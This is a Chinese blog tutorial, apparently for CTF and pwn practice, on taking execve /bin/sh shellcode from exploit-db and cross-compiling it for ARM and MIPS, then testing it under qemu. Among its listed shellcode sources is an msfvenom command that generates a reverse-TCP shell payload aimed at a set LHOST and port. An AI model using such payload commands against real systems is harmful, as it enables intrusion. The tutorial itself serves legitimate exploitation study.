利用 exploit-db 交叉编译 shellcode

最新推荐文章于 2024-04-23 09:29:48 发布
最新推荐文章于 2024-04-23 09:29:48 发布
阅读量507 收藏
点赞数 1
分类专栏: 软件逆向 文章标签: c语言 c++ bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouTheFreedom/article/details/120409098
版权

文章目录

shellcode 通用编写方法

获得shellcode一般有如下五种办法:

  1. pwntools: asm(shellcraft.arm.linux.sh(),arch=’arm’)
  2. msfvenom: msfvenom -p linux/armle/shell/reverse_tcp LHOST=192.168.1.100 LPORT=6666 -f py -o msf.py
  3. shell-storm: http://shell-storm.org/shellcode/
  4. exploit-db: https://www.exploit-db.com/shellcodes
  5. 自己编译:StarCTF 2021 RISC-V Pwn Favourite Architecture: shellcode 编写练习

本次简单介绍下如何通过 www.exploit-db.com 获得 shellcode 源码,然后再交叉编译成不同平台的可执行文件的过程,可执行文件的功能是可以通过 /bin/sh 执行 shell 命令。

编写 ARM shellcode

进入网站后选择左侧菜单栏的 SHELLCODE,然后在右上角搜索 ARM 版的 shellcode。

在这里插入图片描述

拷贝代码到新建文件中,重命名为 execve_arm.c,选择合适版本的交叉编译链,静态编译源码为目标架构的可执行程序。

静态编译

armv6l-gcc -o execve_arm execve.c --static

查看程序架构信息

readelf -h execve_arm

ELF 头:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
  类别:                              ELF32
  数据:                              2 补码,小端序 (little endian)
  版本:                              1 (current)
  OS/ABI:                            UNIX - System V
  ABI 版本:                          0
  类型:                              EXEC (可执行文件)
  系统架构:                          ARM
  版本:                              0x1
  入口点地址:               0x816c
  程序头起点:          52 (bytes into file)
  Start of section headers:          67052 (bytes into file)
  标志:             0x4000002, Version4 EABI, <unknown>
  本头的大小:       52 (字节)
  程序头大小:       32 (字节)
  Number of program headers:         4
  节头大小:         40 (字节)
  节头数量:         27
  字符串表索引节头: 24

qemu 本地运行验证是否可用

qemu-arm-static execve_arm

ubuntu@ubuntu-virtual-machine:~/compile$ qemu-arm-static execve_arm 
Shellcode Length:  32
$ ls -al
total 110168
drwxrwxr-x  8 ubuntu ubuntu      4096 Aug  3 11:09 .
drwxr-xr-x 68 ubuntu ubuntu      4096 Aug  3 09:29 ..
drwxr-xr-x 10 ubuntu ubuntu      4096 Apr  5  2009 armv4l
drwxr-xr-x 10 ubuntu ubuntu      4096 Apr  5  2009 armv5l
drwxr-xr-x 12 ubuntu ubuntu      4096 Mar 16  2017 armv6l
-rw-rw-r--  1 ubuntu ubuntu       345 Jul 30 14:07 execve.c
-rwxrwxr-x  1 ubuntu ubuntu     80062 Jul 30 14:08 execve_arm
-rwxrwxr-x  1 ubuntu ubuntu   4049876 Jul 30 14:27 execve_arm7
-rwxrwxr-x  1 ubuntu ubuntu     38067 Jul 30 15:06 execve_mips
-rw-rw-r--  1 ubuntu ubuntu       805 Jul 30 15:06 execve_mips.c
-rwxrwxr-x  1 ubuntu ubuntu     38035 Jul 30 14:58 execve_mipsel
-rw-rw-r--  1 ubuntu ubuntu       486 Jul 30 14:58 execve_mipsel.c
drwxr-xr-x  8 ubuntu ubuntu      4096 Nov 19  2017 gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabihf
-rw-r--r--  1 ubuntu ubuntu 108376348 Jul 30 14:19 gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabihf.tar.tar
drwxr-xr-x 11 ubuntu ubuntu      4096 Oct 29  2020 mips
drwxr-xr-x 10 ubuntu ubuntu      4096 Apr  5  2009 mipsel
-rwxrwxr-x  1 ubuntu ubuntu     38172 Jul 30 10:18 shellcode
-rw-rw-r--  1 ubuntu ubuntu       593 Jul 30 10:34 shellcode.c
-rwxrwxr-x  1 ubuntu ubuntu     80137 Jul 30 10:35 shellcode_arm
-rwxrwxr-x  1 ubuntu ubuntu     38172 Jul 30 10:18 shellcode_mipsel
$

验证成功,可以继续编译 mips 的版本了。

编写 MIPS shellcode

同样的步骤,在右上角搜索栏搜索 mips,根据实际需要选择大端或小端,我这里选择的是大端。

在这里插入图片描述

复制源码到新建文件中,重命名为 execve_mips.c,选择合适版本的交叉编译链,静态编译源码为目标架构的可执行程序。

静态编译

mips-gcc -o execve_mips execve_mips.c --static

查看程序架构信息

ELF 头:
  Magic:   7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 
  类别:                              ELF32
  数据:                              2 补码,大端序 (big endian)
  版本:                              1 (current)
  OS/ABI:                            UNIX - System V
  ABI 版本:                          0
  类型:                              EXEC (可执行文件)
  系统架构:                          MIPS R3000
  版本:                              0x1
  入口点地址:               0x4002a0
  程序头起点:          52 (bytes into file)
  Start of section headers:          28100 (bytes into file)
  标志:             0x1007, noreorder, pic, cpic, o32, mips1
  本头的大小:       52 (字节)
  程序头大小:       32 (字节)
  Number of program headers:         4
  节头大小:         40 (字节)
  节头数量:         20
  字符串表索引节头: 17

qemu 本地运行验证是否可用

qemu-mips-static execve_mips

ubuntu@ubuntu-virtual-machine:~/compile$ qemu-mips-static execve_mips
sc size 52
$ ls -al
total 110168
drwxrwxr-x  8 ubuntu ubuntu      4096 Aug  3 11:09 .
drwxr-xr-x 68 ubuntu ubuntu      4096 Aug  3 09:29 ..
drwxr-xr-x 10 ubuntu ubuntu      4096 Apr  5  2009 armv4l
drwxr-xr-x 10 ubuntu ubuntu      4096 Apr  5  2009 armv5l
drwxr-xr-x 12 ubuntu ubuntu      4096 Mar 16  2017 armv6l
-rw-rw-r--  1 ubuntu ubuntu       345 Jul 30 14:07 execve.c
-rwxrwxr-x  1 ubuntu ubuntu     80062 Jul 30 14:08 execve_arm
-rwxrwxr-x  1 ubuntu ubuntu   4049876 Jul 30 14:27 execve_arm7
-rwxrwxr-x  1 ubuntu ubuntu     38067 Jul 30 15:06 execve_mips
-rw-rw-r--  1 ubuntu ubuntu       805 Jul 30 15:06 execve_mips.c
-rwxrwxr-x  1 ubuntu ubuntu     38035 Jul 30 14:58 execve_mipsel
-rw-rw-r--  1 ubuntu ubuntu       486 Jul 30 14:58 execve_mipsel.c
drwxr-xr-x  8 ubuntu ubuntu      4096 Nov 19  2017 gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabihf
-rw-r--r--  1 ubuntu ubuntu 108376348 Jul 30 14:19 gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabihf.tar.tar
drwxr-xr-x 11 ubuntu ubuntu      4096 Oct 29  2020 mips
drwxr-xr-x 10 ubuntu ubuntu      4096 Apr  5  2009 mipsel
-rwxrwxr-x  1 ubuntu ubuntu     38172 Jul 30 10:18 shellcode
-rw-rw-r--  1 ubuntu ubuntu       593 Jul 30 10:34 shellcode.c
-rwxrwxr-x  1 ubuntu ubuntu     80137 Jul 30 10:35 shellcode_arm
-rwxrwxr-x  1 ubuntu ubuntu     38172 Jul 30 10:18 shellcode_mipsel
$

成功运行

银河外卖员
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
exploit-db图文教程
xiongIT的博客
12-04 3646
ExploitDB 是一个面向全世界黑客的漏洞提交平台,该平台会公布最新漏洞的相关情况,这些可以帮助企业改善公司的安全状况,同时也以帮助安全研究者和渗透测试工程师更好的进行安全测试工作。Exploit-DB 提供一整套庞大的归档体系,其中涵盖了各类公开的攻击事件、漏洞报告、安全文章以及技术教程等资源。
exploitdb:官方漏洞利用数据库存储库
02-20
漏洞利用数据库Git存储库 这是一个官方的仓库,一个主办。 我们的存储库是: 漏洞和Shellcodes: : 二进制漏洞利用: : 论文: : 漏洞利用数据库是公共漏洞利用和相应的易受攻击软件的存档,专为渗透测试人员和漏洞研究人员使用而开发。 它的目的是作为通过直接提交,邮件列表和其他公共资源收集的, 和的最全面集合,并将它们呈现在可免费使用且易于导航的数据库中。 漏洞利用数据库是漏洞利用和概念验证(而非咨询)的存储库,对于那些立即需要可操作数据的人来说,它是宝贵的资源。 您可以在和了解有关该项目的更多信息。 该存储库每天都会使用最新添加的提交进行更新。 任何其他资源都可以在我们的。 漏洞位于目录中,shellcode位于目录中。 执照 该项目(和SearchSploit)在“ ”下发布。 SearchSploit 该存储库中包含SearchSploit实用程序,使
Exploit-DB漏洞利用
dj1174232716的专栏
08-02 7427
Backtrack 已经内置了一个由” Offebnsive Security”提供的漏洞利用程序集的数据库Exploit-DB,可以用于平时的参考和使用。访问的方法是在命令提示符中输入一下命令: # cd /pentest/exploits/exploitdb/ # cat files.csv | less 即可查看所有内置的漏洞利用程序集,这将会打开Exploit-DB在/pentes
SearchSploit漏洞查找工具使用指南
大方子
10-04 7463
什么是SearchSploit: “searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。 SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-...
Metasploit进阶
Grey的博客
04-06 1722
metasploit之端口扫描msfconsole下启动nmap进行端口扫描msf &gt; nmap -v sV IPmsf &gt; search portscanmsf &gt; use auxiliary/scanner/portscan/syn msf &gt; use auxiliary/scanner/portscan/tcpmsf &gt; use auxiliary/scanne...
Exploit-DB 使用小结
未完成的歌~的博客
09-23 2239
是一个漏洞库网站 ,存储了大量的漏洞利用程序,可以帮助安全研究者和渗透测试工程师更好的进行安全测试工作,目前是世界上公开收集漏洞最全的数据库,该仓库每天都会更新。searchsploit 是一个用于搜索 Exploit-DB 漏洞数据的命令行工具(Kali默认已安装),可以离线搜索 Exploit 数据库,这对于有时候不能联网的渗透工作非常的有用。
渗透与防御技术
热门推荐
YangYubo091699的博客
05-09 2万+
Kali操作系统的基本配置和使用 一、安装 下载KALI操作系统 https://www.kali.org/get-kali/ 二、修改root sudo passwd 三、基本工具介绍 信息搜集工具集: 主要面向网路、端口、服务识别、web指纹等一系列目标信息探测类的工具,常用工具有nmap masscan gobuster (zmap OneForAll) 漏洞分析工具集: 主要面向漏洞的发现、漏洞分析类的工具,漏洞主要面向系统、web、网络设备,常用的工具有 nikto web程序渗透
渗透测试思路总结
weixin_33881050的博客
09-15 2040
一、说明 《Metasploit渗透测试魔鬼训练营》等书已经对渗透测试的步骤流程划分得比较合理透彻了,但感觉在多次通读该类书藉之后仍总感觉不得要领----要对一台给定的主机进行渗透还是不懂到底该如何着手。想来主要是存在以下两个问题。 第一个是在渗透操作系统时,最为关键的从漏洞分析到渗透攻击这一步很难跨越。因为按书中漏洞分析基本只有openvas等漏洞扫描器一条途径,漏洞利用只有Metasploit...
searchsploit工具(exploit-db.com)使用实例 (linux 内核漏洞提权) exploitdb
whatday的专栏
10-30 5729
获取 root 权限是 Linux 漏洞利用的终极目标。跟 Windows 中的 System 用户一样,root 用户拥有对操作系统的所有管理权限。在渗透中,有时候成功利用某些漏洞只会获取一个低权限用户,所以需要使用提权技巧,提升到权限更高的 root 用户,完全控制整个系统。 一般来说,获取到低权限 shell 后我们通常会做下面几件事: 1. 检测操作系统的发行版本 2. 查看内核版本 3...
内网渗透笔记——msf
wang_zui_zui的博客
01-22 4576
Masscan 号称五分钟扫遍互联网 性能优越,极限速度 1000w/s,参数 跟nmap 差不多 -p 80,8000-8100 10.0.0.0/24 --max-rate=100000 //发包的极限速度 masscan 0.0.0.0/0 -p 0-65535 //扫描整个互联网的所有端口 不要轻易尝试....... Metasploit(msf) 一旦出现漏洞,出现利用漏洞的方法,则会马上收录——傻瓜式攻击 早期想要利用漏洞——需知道漏洞的poc和exp...
Windows-Exploit-Suggester-master
03-20
Windows-Exploit-Suggester-master
getExploit:从exploit-db.com下载漏洞利用程序
05-25
getExploit 用于探索exploit-db.com中的漏洞利用的Python脚本。 在Kali Linux中存在类似的脚本,但是不同的是,此python脚本在搜索和下载时将提供更大的灵活性。用法运行getExploit.py脚本以在文本界面输入。 注意:...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
https://www.exploit-db.com/下载POC比较完善的代码
12-21
1,通过读取CVE编号自动下载 2,由于网络问题,下载容易中断。所以设置一个变量来记录执行到了哪一步。 i = 0 #重新开始的话,记得从cve_num1.json的最后一行中取值 可以将这个变量加在CVE列表的最后的一行。...
exploitdb-papers:利用数据库文件
07-24
利用数据库的论文 这些论文位于/docs/ (二进制)和/papers/ (纯文本)目录中。... 您可以在此处(右上 -> 关于 Exploit-DB)和此处(历史)了解有关该项目的更多信息。 该存储库每天更新,包含最
C语言 | Leetcode C语言题解之第45题跳跃游戏II
最新发布
m0_59237910的博客
04-23 363
C语言 | Leetcode C语言题解之第45题跳跃游戏II
【C】 初识C语言
努力学习C/C++
04-21 764
从本篇开始,带你从不会C语言到精通C语言。这篇是让大家对C语言有个初步的了解。下面的内容会拆分不同篇幅单独进行详细讲叙。数据类型变量、常量字符串转义字符注释选择语句循环语句函数数组操作符常见关键字define定义常量和宏指针结构体1.什么是C语言C语言是一门面向过程的计算机编程语言,与C++、C#、Java等面向对象编程语言有所不同。C语言的设计目标是提供一种能以简易的方式编译、处理低级存储器、仅产生少量的机器码以及不需要任何运行环境支持便能运行的编程语言。
数据结构与算法学习笔记七--二叉树(C++)
我叫柱子哥
04-23 609
在计算机科学中,树(Tree)是一种抽象数据类型,用于模拟具有树状结构特征的数据集合。树是由一组节点(Nodes)和连接这些节点的边(Edges)组成的,其中一个节点被指定为根节点(Root),其余节点分层组织成子树(Subtrees)。树的每个节点除了根节点外,都恰好连接到一条来自另一个节点的边,这个节点被称为其父节点(Parent Node)。每个节点可以连接到零个或多个子节点,子节点的节点被称为父节点的孩子节点(Child Node)。根节点(Root):树中的唯一顶层节点,没有父节点。
linux-exploit-suggester2
07-28
针对 Linux 系统的漏洞利用建议工具有很多,其中一个常用的工具是 Linux-exploit-suggester 2。它是一个能够检测 Linux 系统中已知漏洞的脚本,以帮助系统管理员评估系统安全性并提供潜在的漏洞利用建议。 该工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值